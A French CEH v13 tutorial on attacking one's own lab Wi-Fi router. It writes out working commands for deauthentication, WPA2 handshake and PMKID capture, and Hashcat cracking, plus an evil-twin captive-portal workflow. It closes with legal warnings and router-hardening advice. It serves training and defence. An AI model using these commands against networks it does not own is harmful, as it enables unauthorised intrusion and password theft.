Configurer un lab Wi-Fi légal (ton propre routeur), capturer un handshake WPA2 4-way avec aircrack-ng, cracker offline avec Hashcat, exécuter une attaque PMKID-less, comprendre les attaques WPA3 SAE downgrade et FragAttacks. Toutes les commandes attendues au CEH v13.
📍 À lire d’abord : Passer le CEH v13 depuis l’Afrique de l’Ouest — Guide complet 2026 · Lab CEH Kali · Cracking de mots de passe Hashcat et John the Ripper.
⚠️ Cadre légal absolu : ce tutoriel s’applique exclusivement à ton propre routeur Wi-Fi, dans une pièce isolée, sans connecter aucun appareil tiers. Capturer ou cracker le Wi-Fi d’un voisin, d’un café, d’un coworking, d’un FAI ou de n’importe quelle entité tierce est un crime cybersécurité dans tous les pays CEDEAO (loi 2008-12 Sénégal, loi 2013-451 Côte d’Ivoire). Pas d’exception possible.
Introduction
Le module 16 Hacking Wireless Networks du CEH v13 (~4 % de l’examen) est paradoxal : peu de questions à l’examen, mais c’est la zone la plus dangereuse légalement en pratique. Un script kiddie qui scanne le Wi-Fi du voisinage avec aircrack-ng se prend une condamnation pénale ; un pentester qui audite avec mandat sécurise une infrastructure complète d’entreprise.
Ce tutoriel construit un lab Wi-Fi légal contrôlé : un routeur que tu possèdes (typiquement la box Sonatel/Orange remise par ton FAI, ou un routeur acheté pour 25 000 FCFA chez Sonatel), une chaîne d’attaque complète (passage en mode monitor, capture handshake, deauth ciblé, crack offline), et une introduction aux attaques modernes WPA3. À la fin, tu sauras répondre aux questions CEH sur le sujet et faire un audit Wi-Fi pro avec mandat.
Prérequis
- Lab Kali Linux 2026.1 sur PC physique (les VM ne supportent généralement pas le mode monitor sans adaptateur USB Wi-Fi compatible).
- Adaptateur Wi-Fi compatible mode monitor + injection : Alfa AWUS036ACS (Realtek RTL8812AU, 35 USD), ou Alfa AWUS036NHA (Atheros AR9271, 25 USD), ou TP-Link TL-WN722N v1 uniquement (versions v2/v3 NE supportent PAS l’injection — vérifier impérativement avant achat).
- Ton propre routeur Wi-Fi avec accès admin (pour le configurer en WPA2 PSK pour les tests).
- Compréhension du tutoriel Hashcat (cracking offline).
- Niveau attendu : intermédiaire-confirmé.
- Temps estimé : 4 heures avec lab fonctionnel.
Étape 1 — Configurer ton lab Wi-Fi légal
Pour rester strictement légal, isoler ton lab Wi-Fi de toute autre source. Trois précautions obligatoires :
1. Routeur de test physiquement isolé (différent de ton routeur principal famille/job)
2. Pièce fermée, pas de visite, fenêtres fermées (limite portée du Wi-Fi)
3. Documenter la session : début, durée, SSID utilisé, screenshots
Configure le routeur via interface web (typiquement http://192.168.1.1 admin/admin par défaut) :
SSID : "CEHLAB-TEST" (préfixe explicite identifiant un lab)
Sécurité : WPA2-PSK (AES uniquement, pas TKIP)
Password : Choisir un mot de passe FAIBLE pour le test (ex: "password123")
car tu vas le cracker — c'est l'objectif pédagogique
Canal : Manuel, choisir un canal libre (1, 6 ou 11 en 2.4GHz)
Bande : 2.4 GHz uniquement pour ce premier test (compatibilité aircrack-ng)
Diffusion SSID : Activée
Le mot de passe faible est intentionnel : le cracking d’un mot de passe fort prend des semaines GPU, hors scope tutoriel. En audit pro client, on ne crack pas le password — on prouve la possibilité de capture du handshake et on recommande un password robuste.
Étape 2 — Passer la carte Wi-Fi en mode monitor
Le mode monitor permet à la carte d’écouter passivement tous les paquets Wi-Fi à portée, sans s’associer à un réseau. C’est obligatoire pour la capture de handshake.
# Lister les interfaces Wi-Fi
sudo airmon-ng
# Tuer les processus qui peuvent gêner (NetworkManager, wpa_supplicant)
sudo airmon-ng check kill
# Passer wlan0 en mode monitor
sudo airmon-ng start wlan0
# Vérifier — l'interface devient typiquement wlan0mon
sudo iwconfig
Tu vois Mode:Monitor sur wlan0mon. Si la commande échoue avec Operation not permitted, ton adaptateur ne supporte pas le mode monitor (ce qui est le cas de 70 % des cartes Wi-Fi intégrées laptop).
Étape 3 — Découvrir les réseaux à portée
sudo airodump-ng wlan0mon
Affichage en temps réel des AP (Access Points) à portée et des STA (clients) connectés :
BSSID PWR Beacons #Data CH ENC ESSID
AA:BB:CC:DD:EE:FF -45 142 83 6 WPA2 CEHLAB-TEST
11:22:33:44:55:66 -67 98 12 11 WPA2 Sonatel-Box-MyFAI
BSSID STATION PWR Lost Frames
AA:BB:CC:DD:EE:FF AA:11:BB:22:CC:33 -50 0 45
Localise ton lab (BSSID que tu connais d’après ton routeur). Note le BSSID, le canal, et l’adresse MAC d’un client (STA) connecté à ce SSID — c’est la cible du deauth.
Ctrl+C pour arrêter.
⚠️ Tout autre réseau visible (Sonatel-Box, FreeBox-Voisin, etc.) doit rester ignoré. Tu n’attaques que ton CEHLAB-TEST.
Étape 4 — Capturer le handshake WPA2
Lance airodump-ng ciblé sur ton AP, en filtrant le canal et le BSSID, et écris la capture dans un fichier.
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake-capture wlan0mon
Options : -c 6 canal, --bssid filtre, -w préfixe fichier de sortie.
Maintenant, force un client à se reconnecter pour capturer son 4-way handshake. Le 4-way handshake est échangé chaque fois qu’un client s’authentifie avec succès — il contient les éléments cryptographiques permettant de valider une guess de mot de passe offline.
Dans un autre terminal, force la déconnexion d’un client en lui envoyant des paquets deauthentication forgés :
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c AA:11:BB:22:CC:33 wlan0mon
--deauth 5 envoie 5 paquets deauth. -a = BSSID de l’AP, -c = MAC du client.
Le client perd la connexion 1-2 secondes, se reconnecte automatiquement, et son 4-way handshake est capturé par airodump. Tu vois apparaître en haut à droite de l’écran airodump : WPA handshake: AA:BB:CC:DD:EE:FF.
Ctrl+C pour arrêter airodump. Tu as maintenant un fichier handshake-capture-01.cap qui contient le précieux handshake.
Étape 5 — Convertir et cracker offline
Le fichier .cap n’est pas directement consommable par Hashcat. Convertis-le au format Hashcat moderne (mode 22000) :
# Méthode moderne (recommandée 2026)
hcxpcapngtool -o handshake.hc22000 handshake-capture-01.cap
# Méthode classique pour mode 2500 (déprécié mais fonctionnel)
aircrack-ng -J handshake handshake-capture-01.cap
Crack avec Hashcat (mode 22000 = WPA-PBKDF2-PMKID+EAPOL) :
hashcat -m 22000 -a 0 handshake.hc22000 /usr/share/wordlists/rockyou.txt
Avec un mot de passe faible (password123 dans rockyou), le crack prend 1-3 secondes sur RTX 3080. Sur GPU faible ou CPU only, jusqu’à plusieurs minutes.
hashcat output:
Status...........: Cracked
Recovered........: 1/1 (100.00%) Digests
Récupère le password en clair :
hashcat -m 22000 handshake.hc22000 --show
Sortie : aabbccddeeff:aa11bb22cc33:CEHLAB-TEST:password123.
Crack réussi — tu as démontré la chaîne complète d’attaque WPA2 PSK.
Étape 6 — Variante PMKID (sans handshake)
Depuis 2018 (recherches de hashcat dev Jens « atom » Steube), on peut cracker WPA2 sans capturer un handshake complet : le PMKID exposé dans le premier paquet d’un AP suffit. Avantage : pas besoin d’un client connecté pour deauth.
# Capture PMKID
sudo hcxdumptool -i wlan0mon -w pmkid.pcapng
# Filtre pour les BSSID désirés (optionnel)
sudo hcxdumptool -i wlan0mon --filterlist_ap=mybssid.txt --filtermode=2 -w pmkid.pcapng
# Convertir et cracker
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
hashcat -m 22000 -a 0 pmkid.hc22000 rockyou.txt
Tous les routeurs WPA2 récents avec PMK caching activé sont vulnérables. Beaucoup de routeurs PME africains sont concernés.
Étape 7 — WPA3 et ses attaques
WPA3 (publié 2018, déployé massivement à partir de 2020) corrige des faiblesses de WPA2 : il remplace le 4-way handshake par SAE (Simultaneous Authentication of Equals, dragonfly). SAE est résistant au cracking offline — capturer un handshake ne donne pas matière à brute force comme avec WPA2.
Cependant, deux faiblesses notables :
Dragonblood (2019) : timing side-channel et attaques par downgrade quand un AP supporte WPA2/WPA3 transition (la plupart des AP en 2026). Force la connexion en WPA2 puis crack normalement.
# L'attaque downgrade nécessite des outils spécialisés
sudo airodump-ng wlan0mon # observe si AP affiche "WPA3-WPA2 transition"
# Si oui, attaque déauth + capture handshake en mode WPA2 fonctionne
FragAttacks (2021) : 12 CVE révélant des faiblesses dans la fragmentation et l’agrégation de paquets Wi-Fi à tous les niveaux du stack 802.11. Permet diverses attaques (MITM, exfiltration de données). Outils de demo : fragattacks.py du chercheur Mathy Vanhoef sur GitHub.
Pour CEH, connaître ces attaques par leur nom et leur principe — pas besoin de les exécuter.
Étape 8 — Evil Twin : attaque sociale plutôt que cryptographique
L’evil twin contourne le problème du cracking en créant un faux AP identique au vrai. Le client se connecte au faux, on capture le password en clair via une fake captive portal.
# Outil airgeddon — interface menu pour evil twin (sur Kali)
sudo airgeddon
# Ou hostapd-mana / WiFi-Pumpkin pour configurations avancées
Workflow :
1. airgeddon scan les AP → identifie SSID cible
2. clone le SSID en evil twin (même nom, MAC similaire)
3. déauth massif sur l'AP légitime → clients déconnectés
4. clients se reconnectent — le evil twin a meilleur signal
5. captive portal demande "réauthentification" (faux portail)
6. client tape son mot de passe Wi-Fi → enregistré en clair
Cette attaque n’a aucune dimension cryptographique : elle exploite la confiance utilisateur. C’est pourquoi WPA3 + 802.1X (EAP-TLS avec certificats) est la seule défense vraiment solide en 2026.
⚠️ Evil twin contre un réseau public est strictement illégal. À pratiquer uniquement contre ton lab personnel.
Étape 9 — Sécuriser ton propre Wi-Fi
À la fin du tutoriel, durcis ton Wi-Fi domicile pour qu’il ne soit pas crackable comme dans l’exercice :
1. WPA3-PSK uniquement (pas de mode transition WPA2/WPA3)
2. Mot de passe : 16 caractères minimum, mix maj/min/chiffres/symboles, non-dictionnaire
Exemple : "Tr0p_d3_b3au-jour-AO!2026"
3. Désactiver WPS (ne devrait jamais être activé en 2026)
4. Désactiver UPnP côté routeur sauf besoin spécifique
5. Mettre à jour le firmware du routeur tous les 3 mois
6. SSID non-générique (pas "TP-Link_xxxxxx", changer en quelque chose qui ne révèle pas la marque)
7. Si possible, MAC filtering pour les appareils domestiques (gain marginal)
8. Désactiver WPA2 fallback si WPA3 supporté
9. Utiliser un VLAN invité distinct pour les visiteurs
10. Monitorer les nouveaux clients avec un script Python ou une appli routeur
Tester ton durcissement : essaie de capturer ton propre handshake avec aircrack-ng. Si la capture met 30+ minutes ou si le crack offline n’aboutit pas en 24h, tu es bien sécurisé.
Erreurs fréquentes
| Erreur | Cause | Solution |
|---|---|---|
airmon-ng start wlan0 retourne erreur |
Carte non compatible mode monitor | Vérifier compatibilité avec liste Aircrack-ng officielle, acheter Alfa si besoin |
| Aucun handshake capturé après deauth | Client pas vraiment déconnecté ou pas d’auto-reconnect | Augmenter --deauth 50, attendre, vérifier qu’un client est actif |
hcxpcapngtool retourne 0 handshakes |
Capture incomplète (4 paquets EAPOL nécessaires) | Recommencer airodump avec target plus précis et plus de patience |
| Hashcat dit No hashes loaded | Erreur de conversion | Vérifier format .hc22000 (et non .hccapx qui est l’ancien format) |
| Pas de réseau visible en airodump | Adaptateur USB non en mode monitor | iwconfig wlan0mon doit montrer Mode:Monitor |
| Le crack ne trouve pas le password | Wordlist insuffisante | Utiliser SecLists, rules best64, ou si forte entropie : abandonner cracking, prouver capture |
| airodump bloque le trafic Wi-Fi normal | Mode monitor monopolise la carte | Sortir du mode monitor avec airmon-ng stop wlan0mon après l’exercice |
| Latence GPU faible sur portable | Carte intégrée Intel UHD | Crack lent, accepter ou louer GPU cloud (vast.ai, runpod) |
| Routeur ne fait plus apparaître les voisins | Adaptateur en monitor avec antenne courte | Améliorer antenne (Alfa avec 9 dBi externe) |
Adaptation au contexte ouest-africain
Pour les pentesters Wi-Fi en mission audit : les box Sonatel/Orange/Free SN/MTN sont historiquement livrées avec WPA2-PSK et mots de passe faibles écrits sur l’étiquette. Beaucoup de PME ne changent jamais le password initial — auditeur trouve 80 % de Wi-Fi crackables en 1 heure. Ton job : convaincre la direction d’investir 50 000 FCFA dans un routeur enterprise WPA3 + 802.1X.
Pour les administrateurs réseau d’entreprises bancaires : déployer un Wi-Fi enterprise type Cisco Meraki ou Aruba InstantOn avec authentification 802.1X par compte Active Directory. Coût : 250 000-450 000 FCFA pour un access point pro vs 25 000 FCFA pour une box grand public. ROI : élimination du risque legal (PCI DSS exige WPA2 enterprise minimum).
Pour les centres de formation : le TP capture-handshake-crack sur un routeur lab de 25 000 FCFA est l’un des plus impressionnants pédagogiquement. Voir un mot de passe Wi-Fi craqué en 15 secondes ancre durablement la nécessité de WPA3 + passwords forts.
Pour les associations de protection des consommateurs : sensibiliser les usagers ouest-africains sur le risque de l’evil twin dans les cafés, hôtels, aéroports. Conseiller systématique : VPN obligatoire sur Wi-Fi public, MFA partout, ne jamais saisir de password sur captive portal sans vérifier le certificat.
FAQ
Pourquoi a-t-on besoin d’un client connecté pour capturer un handshake ?
Le 4-way handshake n’est échangé qu’au moment d’une authentification. Sans client, pas d’auth, pas de handshake. C’est pourquoi PMKID est précieux : il existe sur les beacons sans nécessité de client.
WPA3 est-il vraiment incassable ?
Plus difficile mais pas incassable. Dragonblood et FragAttacks ont prouvé qu’il y a des angles d’attaque. La résistance au cracking offline reste forte, mais MITM / downgrade / side-channel restent possibles. Sécurité de WPA3 forte mais pas absolue.
Les attaques contre Wi-Fi laissent-elles des traces ?
Oui, dans les logs du routeur (associations, déauths). Un admin qui surveille verrait : déauthentifications massives → suspect. C’est pourquoi WIDS (Wireless IDS) comme Cisco Wireless Intrusion Prevention System existent.
Combien de temps pour cracker un WPA2 fort (16 chars random) ?
Avec rockyou + best64.rule sur RTX 3080 : 30 minutes-1 heure pour épuiser sans trouver. Brute force 16 chars random ASCII : ~10^28 / 1 MH/s pour WPA2 = trillions d’années. Insolvable. C’est pourquoi un password fort suffit.
Faut-il vraiment un adaptateur USB Alfa ?
Si ta carte intégrée laptop supporte le mode monitor (rare, ~30 %), non. Pour 99 % des laptops modernes, oui. Compter 25-40 USD pour un Alfa AWUS036NHA, livraison Dakar/Abidjan via vendeurs spécialisés ou import direct AliExpress.
Aircrack-ng est-il toujours pertinent en 2026 ?
Oui. Mature depuis 20 ans, supporte tous les protocoles Wi-Fi, intègre la nouvelle suite hcxtools pour WPA3. Reste la référence open-source. Aircrack-ng + Hashcat = stack complète pentesting Wi-Fi.
Comment auditer un Wi-Fi enterprise (802.1X) ?
Beaucoup plus complexe. Au CEH, on s’arrête à WPA2-PSK. Pour 802.1X EAP-TLS (certificats), il faut compromettre soit l’AC (autorité de certification) soit un certificat client — typiquement via phishing ou compromission d’un poste. C’est OSCP/red team niveau.
Pour aller plus loin
- 🔝 Article cadre : Passer le CEH v13 depuis l’Afrique de l’Ouest — Guide complet 2026
- ⬅️ Tous les tutoriels du cluster CEH (à lire dans l’ordre) : Lab Kali · OSINT · Nmap avancé · Burp Suite · Metasploit · Hashcat / John
- ➡️ Suite logique : passer à l’OSCP pour cybersec offensive avancée, ou au CompTIA Security+ pour cybersec défensive systémique.
- Documentation officielle : Aircrack-ng documentation, Hashcat WPA modes. Mathy Vanhoef research — chercheur Dragonblood et FragAttacks.
- Adaptateurs Wi-Fi compatibles : liste complète sur Aircrack-ng Compatibility.
- Suggestion d’entraînement : reproduis l’intégralité du workflow de cet article sur ton routeur perso. Une fois maîtrisé, durcis ton Wi-Fi (étape 9), retente l’attaque — tu dois pouvoir prouver que ton durcissement a fonctionné. C’est la boucle complète attaque/défense d’un pentester pro.
Mots-clés secondaires : WPA2 handshake capture, aircrack-ng tutoriel, hashcat mode 22000, evil twin attack, PMKID hcxdumptool, WPA3 dragonblood, FragAttacks, Wi-Fi pentesting CEH.